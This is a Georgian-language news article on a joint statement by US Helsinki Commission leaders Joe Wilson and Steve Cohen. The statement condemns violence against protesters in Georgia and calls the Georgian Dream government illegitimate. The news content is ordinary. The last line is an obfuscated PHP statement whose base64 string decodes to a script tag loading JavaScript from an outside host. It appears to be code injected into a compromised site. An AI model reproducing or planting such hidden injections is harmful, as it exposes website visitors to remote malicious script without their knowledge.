celsiusi
ავერსი შნაიდერი

აშშ-ის ჰელსინკის კომისიის თავმჯდომარე ჯო უილსონი (რესპუბლიკური პარტია) და ერთ-ერთი ლიდერი, კონგრესმენი სტივ კოენის (დემოკრატიული პარტია) საქართველოში მიმდინარე მოვლენებთან დაკავშირებით ერთობლივ განცხადებას ავრცელებენ.

განცხადებაში ისინი „მძაფრად გმობენ“ მშვიდობიანი პროტესტის მონაწილეების მიმართ „ექსტრემალური ძალადობის“ ფორმას.

„ხუთშაბათს ქართველები თბილისში და მთელი ქვეყნის მასშტაბით ქუჩებში გავიდნენ, რათა ხმა ამოიღონ "ქართული ოცნების" პარტიის გადაწყვეტილების წინააღმდეგ, შეაჩეროს ევროკავშირში გაწევრიანება. ამ მშვიდობიან პროტესტებს ექსტრემალური ძალადობით დახვდნენ. ჩვენ ამ პასუხს ყველაზე მძაფრი ფორმით ვგმობთ.

არსებობს დამაჯერებელი მტკიცებულებები იმისა, რომ "ქართული ოცნების" მთავრობამ გააყალბა ქვეყნის ოქტომბრის არჩევნები, რათა ძალაუფლება შეინარჩუნოს და კიდევ ერთხელ უგულებელყოს ქართველი ხალხის ევროატლანტიკური ინტეგრაციისადმი მისწრაფებები. ამ კვირის დასაწყისში, "ქართულმა ოცნებამ" ახალი მთავრობა დასვა ოპოზიციის სრული ბოიკოტის ფონზე და პრეზიდენტის ნებართვის გარეშე, საქართველოს კონსტიტუციის საწინააღმდეგოდ. შესაბამისად, ეს მთავრობა არალეგიტიმურია. ჩვენ ქართველ ხალხთან ვდგავართ და მოვუწოდებთ ამჟამინდელ და მომავალ ადმინისტრაციებს, დაუბრუნდეს ქართველების მხარდაჭერას მათ ბრძოლაში - აღადგინონ საკუთარ ქვეყანაში დემოკრატია და თავისუფლება.

აშშ-ის სახელმწიფო დეპარტამენტმა უნდა გადადგას ნაბიჯები, რათა დასაჯონ ისინი, ვინც პასუხისმგებელნი არიან ქართველების მშვიდობიანი პროტესტისა და საკუთარი ლიდერების არჩევის უფლების დარღვევაზე", - ნათქვამია აშშ-ის ჰელსინკის კომისიის თავმჯდომარის, ჯო უილსონისა (რესპუბლიკური პარტია) და ერთ-ერთი ლიდერის, კონგრესმენი სტივ კოენის (დემოკრატიული პარტია) ერთობლივ განცხადებაში.

71
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");